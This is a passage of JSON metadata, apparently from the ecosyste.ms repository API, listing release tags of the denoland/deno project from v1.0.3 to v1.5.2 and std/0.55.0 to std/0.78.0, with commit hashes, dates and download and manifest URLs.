sitories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://c